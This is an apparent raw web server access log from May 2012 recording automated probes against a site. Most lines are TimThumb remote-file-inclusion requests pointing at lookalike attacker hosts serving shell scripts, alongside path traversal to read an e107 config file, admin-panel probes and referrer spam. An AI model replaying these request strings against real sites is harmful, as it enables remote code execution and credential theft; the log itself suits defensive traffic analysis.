178.236.154.100 - - [14/May/2012:03:06:32 +0200] "GET /stats//wp-content/themes/Polished/timthumb.php?src= HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
178.236.154.100 - - [14/May/2012:03:06:33 +0200] "GET /stats//wp-content/themes/Polished/timthumb.php?src=http://picasa.com.sigeart.com/wp-content/images/soul.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
178.236.154.100 - - [14/May/2012:03:06:34 +0200] "GET //wp-content/themes/Polished/timthumb.php?src= HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
178.236.154.100 - - [14/May/2012:03:06:35 +0200] "GET //wp-content/themes/Polished/timthumb.php?src=http://picasa.com.sigeart.com/wp-content/images/soul.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
190.151.120.198 - - [14/May/2012:03:06:43 +0200] "GET /stats//wp-content/themes/eStore/timthumb.php?src= HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.151.120.198 - - [14/May/2012:03:06:45 +0200] "GET /stats//wp-content/themes/eStore/timthumb.php?src=http://picasa.com.sigeart.com/wp-content/images/soul.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.151.120.198 - - [14/May/2012:03:06:46 +0200] "GET //wp-content/themes/eStore/timthumb.php?src= HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.151.120.198 - - [14/May/2012:03:06:48 +0200] "GET //wp-content/themes/eStore/timthumb.php?src=http://picasa.com.sigeart.com/wp-content/images/soul.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:03:07:43 +0200] "GET /logs/access_log HTTP/1.0" 200 325978 "http://playbandroid.info/sitemap196.html" "Mozilla/4.79 [en] (Windows NT 5.0; U)"
78.137.37.171 - - [14/May/2012:03:07:44 +0200] "GET /logs/access_log HTTP/1.0" 200 326151 "http://playbandroid.info/sitemap196.html" "Mozilla/0.91 Beta (Windows)"
78.137.37.171 - - [14/May/2012:03:07:44 +0200] "GET /logs/access_log HTTP/1.0" 200 326314 "http://playbandroid.info/sitemap196.html" "Mozilla/4.79 [en] (Windows NT 5.0; U)"
78.137.37.171 - - [14/May/2012:03:07:45 +0200] "GET /logs/access_log HTTP/1.0" 200 326487 "http://playbandroid.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
78.137.37.171 - - [14/May/2012:03:07:45 +0200] "GET /logs/access_log HTTP/1.0" 200 326678 "http://playbandroid.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
188.138.91.140 - - [14/May/2012:03:08:35 +0200] "GET /stats/wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:08:36 +0200] "GET /wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.184.137.44 - - [14/May/2012:03:08:51 +0200] "GET /stats//wp-content/themes/sakura/plugins/woo-tumblog/functions/thumb.php?src=http://blogger.com.antarticachilena.cl/sh.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.184.137.44 - - [14/May/2012:03:08:51 +0200] "GET //wp-content/themes/sakura/plugins/woo-tumblog/functions/thumb.php?src=http://blogger.com.antarticachilena.cl/sh.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:09:01 +0200] "GET /stats/wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:09:02 +0200] "GET /wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:09:04 +0200] "GET /stats/wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:09:05 +0200] "GET /wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.33.209.156 - - [14/May/2012:03:09:53 +0200] "GET /stats/wp-content/themes/InStyle/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.33.209.156 - - [14/May/2012:03:09:53 +0200] "GET /wp-content/themes/InStyle/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.33.209.156 - - [14/May/2012:03:10:02 +0200] "GET /stats/wp-content/themes/InStyle/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.33.209.156 - - [14/May/2012:03:10:02 +0200] "GET /wp-content/themes/InStyle/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.141.35.196 - - [14/May/2012:03:10:30 +0200] "GET /stats//wp-content/themes/classifiedstheme/thumbs/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 331 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
95.141.35.196 - - [14/May/2012:03:10:32 +0200] "GET //wp-content/themes/classifiedstheme/thumbs/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 325 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
95.132.213.162 - - [14/May/2012:03:10:47 +0200] "GET /logs/access_log HTTP/1.0" 200 330507 "http://androidenplay.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)"
95.132.213.162 - - [14/May/2012:03:11:00 +0200] "GET /logs/access_log HTTP/1.0" 200 330690 "http://androidenplay.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
95.132.213.162 - - [14/May/2012:03:11:01 +0200] "GET /logs/access_log HTTP/1.0" 200 330952 "http://androidenplay.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
84.88.226.250 - - [14/May/2012:03:11:05 +0200] "GET /stats/wp-content/themes/TheProfessional/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
84.88.226.250 - - [14/May/2012:03:11:05 +0200] "GET /wp-content/themes/TheProfessional/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:03:11:08 +0200] "GET /logs/access_log HTTP/1.0" 200 331701 "http://androidenplay.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:03:11:08 +0200] "GET /logs/access_log HTTP/1.0" 200 331920 "http://androidenplay.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:03:11:37 +0200] "GET /logs/access_log HTTP/1.0" 200 332149 "http://playbandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
78.137.37.171 - - [14/May/2012:03:11:38 +0200] "GET /logs/access_log HTTP/1.0" 200 332398 "http://playbandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
78.137.37.171 - - [14/May/2012:03:11:39 +0200] "GET /logs/access_log HTTP/1.0" 200 332593 "http://playbandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
78.137.37.171 - - [14/May/2012:03:11:39 +0200] "GET /logs/access_log HTTP/1.0" 200 332794 "http://playbandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
78.137.37.171 - - [14/May/2012:03:11:40 +0200] "GET /logs/access_log HTTP/1.0" 200 333055 "http://playbandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))"
202.43.34.50 - - [14/May/2012:03:11:59 +0200] "GET /stats/log.keys.html/admin/file_manager.php/login.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:12:00 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:12:01 +0200] "GET /stats/admin/file_manager.php/login.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
188.138.91.140 - - [14/May/2012:03:13:33 +0200] "GET /stats/wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:13:34 +0200] "GET /wp-content/themes/arthem-mod/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.240.148 - - [14/May/2012:03:14:15 +0200] "GET /stats/wp-content/themes/InStyle/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.240.148 - - [14/May/2012:03:14:16 +0200] "GET /wp-content/themes/InStyle/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.240.148 - - [14/May/2012:03:15:13 +0200] "GET /stats/wp-content/themes/InStyle/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.240.148 - - [14/May/2012:03:15:14 +0200] "GET /wp-content/themes/InStyle/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:03:15:38 +0200] "GET /stats//wp-content/themes/deep-blue/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:03:15:39 +0200] "GET //wp-content/themes/deep-blue/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
123.49.59.150 - - [14/May/2012:03:15:56 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
123.49.59.150 - - [14/May/2012:03:15:56 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
78.137.37.171 - - [14/May/2012:03:16:09 +0200] "GET /logs/access_log HTTP/1.0" 200 336298 "http://playbandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:03:16:10 +0200] "GET /logs/access_log HTTP/1.0" 200 336508 "http://playbandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
78.137.37.171 - - [14/May/2012:03:16:10 +0200] "GET /logs/access_log HTTP/1.0" 200 336713 "http://playbandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:03:16:11 +0200] "GET /logs/access_log HTTP/1.0" 200 336959 "http://playbandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)"
78.137.37.171 - - [14/May/2012:03:16:11 +0200] "GET /logs/access_log HTTP/1.0" 200 337195 "http://playbandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
202.43.34.50 - - [14/May/2012:03:16:20 +0200] "GET /stats/log.keys.html/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:16:21 +0200] "GET /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:16:21 +0200] "GET /stats/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.33.197.242 - - [14/May/2012:03:16:37 +0200] "GET /stats//wp-content/themes/busybee/tools/timthumb.php?src= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:03:16:38 +0200] "GET /stats//wp-content/themes/busybee/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:03:16:38 +0200] "GET /stats//wp-content/themes/busybee/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:03:16:38 +0200] "GET //wp-content/themes/busybee/tools/timthumb.php?src= HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:03:16:39 +0200] "GET //wp-content/themes/busybee/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:03:16:39 +0200] "GET //wp-content/themes/busybee/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
64.9.215.134 - - [14/May/2012:03:18:04 +0200] "GET /stats//wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:03:18:07 +0200] "GET /stats//wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:03:18:10 +0200] "GET //wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:03:18:13 +0200] "GET //wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
188.165.95.14 - - [14/May/2012:03:19:31 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
188.165.95.14 - - [14/May/2012:03:19:31 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
202.43.34.50 - - [14/May/2012:03:20:04 +0200] "POST /stats/log.keys.html/%22shop%22 HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:04 +0200] "GET /stats/log.keys.html/bangsat.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:05 +0200] "POST /stats/log.keys.html/%22shop%22 HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:06 +0200] "GET /stats/log.keys.html/e107_plugins/my_gallery/image.php?file=../../e107_config.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:06 +0200] "POST /%22shop%22 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:07 +0200] "GET /bangsat.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:07 +0200] "POST /%22shop%22 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:08 +0200] "GET /e107_plugins/my_gallery/image.php?file=../../e107_config.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:09 +0200] "POST /stats/%22shop%22 HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:09 +0200] "GET /stats/bangsat.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:10 +0200] "POST /stats/%22shop%22 HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.43.34.50 - - [14/May/2012:03:20:10 +0200] "GET /stats/e107_plugins/my_gallery/image.php?file=../../e107_config.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
64.9.215.134 - - [14/May/2012:03:20:28 +0200] "GET /stats//wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:03:20:31 +0200] "GET /stats//wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:03:20:34 +0200] "GET //wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:03:20:37 +0200] "GET //wp-content/themes/LondonLive/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
78.137.37.171 - - [14/May/2012:03:20:50 +0200] "GET /logs/access_log HTTP/1.0" 200 344476 "http://playbandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)"
78.137.37.171 - - [14/May/2012:03:20:51 +0200] "GET /logs/access_log HTTP/1.0" 200 344667 "http://playbandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
78.137.37.171 - - [14/May/2012:03:20:52 +0200] "GET /logs/access_log HTTP/1.0" 200 344907 "http://playbandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)"
188.165.95.14 - - [14/May/2012:03:20:52 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
188.165.95.14 - - [14/May/2012:03:20:52 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
78.137.37.171 - - [14/May/2012:03:20:52 +0200] "GET /logs/access_log HTTP/1.0" 200 345292 "http://playbandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)"
78.137.37.171 - - [14/May/2012:03:20:53 +0200] "GET /logs/access_log HTTP/1.0" 200 345667 "http://playbandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
95.132.213.162 - - [14/May/2012:03:21:06 +0200] "GET /logs/access_log HTTP/1.0" 200 345868 "http://androidenplay.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
95.132.213.162 - - [14/May/2012:03:21:13 +0200] "GET /logs/access_log HTTP/1.0" 200 346064 "http://androidenplay.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
95.132.213.162 - - [14/May/2012:03:21:20 +0200] "GET /logs/access_log HTTP/1.0" 200 346275 "http://androidenplay.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:03:21:30 +0200] "GET /logs/access_log HTTP/1.0" 200 346543 "http://androidenplay.info/sitemap56.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
95.132.213.162 - - [14/May/2012:03:21:32 +0200] "GET /logs/access_log HTTP/1.0" 200 346726 "http://androidenplay.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
188.165.95.14 - - [14/May/2012:03:21:45 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
188.165.95.14 - - [14/May/2012:03:21:45 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
188.165.95.14 - - [14/May/2012:03:21:51 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
188.165.95.14 - - [14/May/2012:03:21:51 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
123.49.59.150 - - [14/May/2012:03:21:53 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
123.49.59.150 - - [14/May/2012:03:21:54 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
